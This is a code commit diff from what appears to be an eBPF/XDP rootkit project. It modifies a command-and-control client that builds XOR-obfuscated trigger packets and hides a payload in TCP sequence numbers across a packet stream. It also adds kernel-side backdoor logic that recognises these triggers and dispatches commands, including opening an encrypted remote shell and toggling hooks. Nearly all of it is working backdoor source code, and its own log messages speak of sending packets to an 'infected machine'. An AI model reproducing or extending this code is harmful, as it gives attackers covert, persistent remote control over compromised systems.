Fixed a big bug in previous client terminals, also made the new multi-triggered backdoor to work completely and connect to encrypted session

src/client/client.c

@@ -220,25 +220,25 @@ void activate_command_control_shell_encrypted(char* argv){
     //K3 with command to start the encrypted connection with the backdoor
     char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1] = CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL;
     char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
-    strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
         result[ii] = section[ii] ^ key1[ii];
     }
-    strncpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
 
-    strncpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
         result[ii] = section[ii] ^ key2[ii];
     }
-    strncpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
 
-    strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
-    strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
         result[ii] = section[ii] ^ section2[ii] ^ key3[ii];
     }
 
-    strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     
     
     packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
@@ -274,30 +274,30 @@ void hook_control_command(char* argv, int mode){
     char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1];
     //K3 with command to start the encrypted connection with the backdoor
     if(mode == 0){
-        strncpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+        memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_DEACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     }else{
-        strncpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+        memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_HOOK_ACTIVATE_ALL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     }
     char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
-    strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
         result[ii] = section[ii] ^ key1[ii];
     }
-    strncpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
 
-    strncpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
         result[ii] = section[ii] ^ key2[ii];
     }
-    strncpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
 
-    strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
-    strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
         result[ii] = section[ii] ^ section2[ii] ^ key3[ii];
     }
 
-    strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    memcpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
     
     packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
     printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
@@ -318,7 +318,7 @@ void activate_command_control_shell_encrypted_multi_packet(char* argv){
     printf("["KBLU"INFO"RESET"]""Crafting malicious packet stream...\n");
     
     //Stream of 3 packets, 4 bytes on each if using sequence numbers for hiding the payload
-    stream_t stream = build_standard_packet_stream_empty_payload(CC_STREAM_TRIGGER_PAYLOAD_LEN/CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES, 8000, 9000, local_ip, argv);
+    stream_t stream = build_standard_packet_stream_empty_payload(CC_STREAM_TRIGGER_PAYLOAD_LEN/CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES, 8500, 9000, local_ip, argv);
     char *payload = calloc(CC_STREAM_TRIGGER_PAYLOAD_LEN, sizeof(char));
     srand(time(NULL));
     for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN; ii++){
@@ -326,15 +326,22 @@ void activate_command_control_shell_encrypted_multi_packet(char* argv){
     }
     inet_pton(AF_INET, argv, (void*)(payload+0x01));
     uint16_t port = htons(8000);
-    strncpy(payload+0x05, (char*)&port, 0x02);
-    char result[0x02];
+    memcpy(payload+0x05, (char*)&port, 0x02);
+    char result[0x03];
     char key[0x03] = CC_STREAM_TRIGGER_KEY_ENCRYPTED_SHELL;
     for(int ii=0; ii<0x02; ii++){
         result[ii] = payload[0x05+ii] ^ key[ii];
+        printf("R:%x, P5:%x, K3:%x\n", result[ii], payload[0x05+ii], key[ii]);
     }
-    strncpy(payload+0x08, result, 0x02);
-    uint16_t crc = crc16(payload, 10);
-    strncpy(payload+0x0A, (char*)&crc, 0x02);
+    printf("Payload before XOR: ");
+    for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN; ii++){
+        printf("%x ", payload[ii]);
+    }
+    printf("\n");
+    memcpy(payload+0x08, result, 0x02);
+    char* payload_p = payload;
+    uint16_t crc = crc16(payload_p, 10);
+    memcpy(payload+0x0A, (char*)&crc, 0x02);
     printf("Payload before XOR: ");
     for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN; ii++){
         printf("%x ", payload[ii]);
@@ -343,7 +350,7 @@ void activate_command_control_shell_encrypted_multi_packet(char* argv){
     //Rolling xor
     for(int ii=1; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN; ii++){
         char xor_res = payload[ii-1] ^ payload[ii];
-        strncpy(payload+ii, (char*)&(xor_res), 0x01);
+        memcpy(payload+ii, (char*)&(xor_res), 0x01);
     }
 
     printf("Payload after XOR: ");
@@ -371,7 +378,7 @@ void activate_command_control_shell_encrypted_multi_packet(char* argv){
     }
     printf("["KGRN"OK"RESET"]""Packet stream successfully sent to the backdoor in completeness\n");
     
-    server_run(8000);
+    server_run(8500);
 }
 
 

src/common/c&c.h

@@ -2,7 +2,7 @@
 #define __BPF_CC_H
 
 //C&C V0 & V1 --> Unencrypted transmission with RAW sockets, no TCP conn
-//Protocol messages are also used in the secure channel of V2 & V3 backdoor
+//Protocol messages are also used inside the secure channel of V2 & V3 backdoor
 #define CC_PROT_SYN "CC_SYN"
 #define CC_PROT_ACK "CC_ACK"
 #define CC_PROT_MSG "CC_MSG#"
@@ -25,13 +25,13 @@
 #define CC_PROT_COMMAND_HOOK_ACTIVATE_ALL 1
 #define CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL 2
 
-//C&C V3 -- Distributed hidden payload in packet stream
+//C&C V3 -- Distributed hidden payload in packet stream + encrypted shell
 struct trigger_t {
     unsigned int seq_raw;
 };
 #define CC_STREAM_TRIGGER_PAYLOAD_LEN 12
 #define CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES 4
-#define CC_STREAM_TRIGGER_KEY_ENCRYPTED_SHELL "\x2C\x82"
+#define CC_STREAM_TRIGGER_KEY_ENCRYPTED_SHELL CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL
 
 
 #endif

src/ebpf/include/xdp/backdoor.h

@@ -11,6 +11,29 @@
 #include "../../common/c&c.h"
 #include "../bpf/defs.h"
 
+int execute_key_command(int command_received){
+    int pid = -1; //Received by network stack, just ignore
+    switch(command_received){
+        case CC_PROT_COMMAND_ENCRYPTED_SHELL:
+            bpf_printk("Received request to start encrypted connection\n");
+            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
+            break;
+        case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
+            bpf_printk("Received request to activate all hooks\n");
+            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
+            break;
+        case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
+            bpf_printk("Received request to deactivate all hooks\n");
+            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
+            break;
+        default:
+            bpf_printk("Command received unknown: %d\n", command_received);
+    }
+
+    return 0;
+}
+
+
 static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 payload_size){
     char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
     char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
@@ -113,23 +136,7 @@ backdoor_finish:
 
     //If we reach this point then we received trigger packet
     bpf_printk("Finished backdoor V1 check with success\n");
-    int pid = -1; //Received by network stack, just ignore
-    switch(command_received){
-        case CC_PROT_COMMAND_ENCRYPTED_SHELL:
-            bpf_printk("Received request to start encrypted connection\n");
-            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
-            break;
-        case CC_PROT_COMMAND_HOOK_ACTIVATE_ALL:
-            bpf_printk("Received request to activate all hooks\n");
-            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
-            break;
-        case CC_PROT_COMMAND_HOOK_DEACTIVATE_ALL:
-            bpf_printk("Received request to deactivate all hooks\n");
-            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
-            break;
-        default:
-            bpf_printk("Command received unknown: %d\n", command_received);
-    }
+    execute_key_command(command_received);
 
 
     return XDP_DROP; 
@@ -139,16 +146,25 @@ backdoor_finish:
 static __always_inline int manage_backdoor_trigger_v3(struct backdoor_packet_log_data b_data){
     int last_received = b_data.last_packet_modified;
     int first_packet;
-    if(last_received>0&&last_received<3){
-        first_packet = last_received-1;
+    if(last_received>=0&&last_received<2){
+        first_packet = last_received+1;
     }else{
-        first_packet = (CC_STREAM_TRIGGER_PAYLOAD_LEN / CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES) -1;
+        first_packet = 0;
     } 
 
     //The following routine (not just the next check) is necessarily dirty in terms of programming,
     //but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
     char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN] = {0};
-    if(first_packet == 1){
+    if(first_packet == 0){
+        for(int ii=first_packet; ii<3; ii++){
+            __u32 seq_num = b_data.trigger_array[ii].seq_raw;
+            __builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES*ii), &(seq_num), sizeof(__u32));
+        }
+        for(int ii=0; ii<first_packet; ii++){
+            __u32 seq_num = b_data.trigger_array[ii].seq_raw;
+            __builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES*ii), &(seq_num), sizeof(__u32));
+        }
+    }else if(first_packet == 1){
         for(int ii=first_packet; ii<3; ii++){
             __u32 seq_num = b_data.trigger_array[ii].seq_raw;
             __builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES*ii), &(seq_num), sizeof(__u32));
@@ -166,15 +182,6 @@ static __always_inline int manage_backdoor_trigger_v3(struct backdoor_packet_log
             __u32 seq_num = b_data.trigger_array[ii].seq_raw;
             __builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES*ii), &(seq_num), sizeof(__u32));
         }
-    }else if(first_packet == 3){
-        for(int ii=first_packet; ii<3; ii++){
-            __u32 seq_num = b_data.trigger_array[ii].seq_raw;
-            __builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES*ii), &(seq_num), sizeof(__u32));
-        }
-        for(int ii=0; ii<first_packet; ii++){
-            __u32 seq_num = b_data.trigger_array[ii].seq_raw;
-            __builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES*ii), &(seq_num), sizeof(__u32));
-        }
     }
     
     bpf_printk("Payload before XOR: ");
@@ -221,9 +228,35 @@ static __always_inline int manage_backdoor_trigger_v3(struct backdoor_packet_log
         return XDP_PASS;
     }
 
+    //Check the K3 used, that indicates the command issued, and whether it was a valid payload too
+    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
+    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN+1];
+    int correct = 1;
+    int command_received = -1;
+    //Encrypted shell request
+    __builtin_memcpy(key3, CC_STREAM_TRIGGER_KEY_ENCRYPTED_SHELL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
+    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
+        result[ii] = payload[0x05+ii] ^ payload[0x08+ii];
+        if(result[ii]!=(key3[ii])){
+            bpf_printk("R: %x, K3:%x", result[ii], key3[ii]);
+            bpf_printk("P5:%x, P8:%x\n", payload[0x05+ii], payload[0x08+ii]);
+            correct = 0;
+        }
+    }
+    if(correct == 1){
+        //Found valid k3 value
+        command_received = CC_PROT_COMMAND_ENCRYPTED_SHELL;
+        goto backdoor_finish_v3;
+    }
 
+backdoor_finish_v3:
+    //Found no valid key 3
+    if(correct==0){
+        bpf_printk("FAIL CHECK 3\n");
+        return XDP_PASS;
+    }
     bpf_printk("Completed backdoor trigger v3, b_data position: %i\n", b_data.last_packet_modified);
-
+    execute_key_command(command_received);
 
     return XDP_DROP;
 }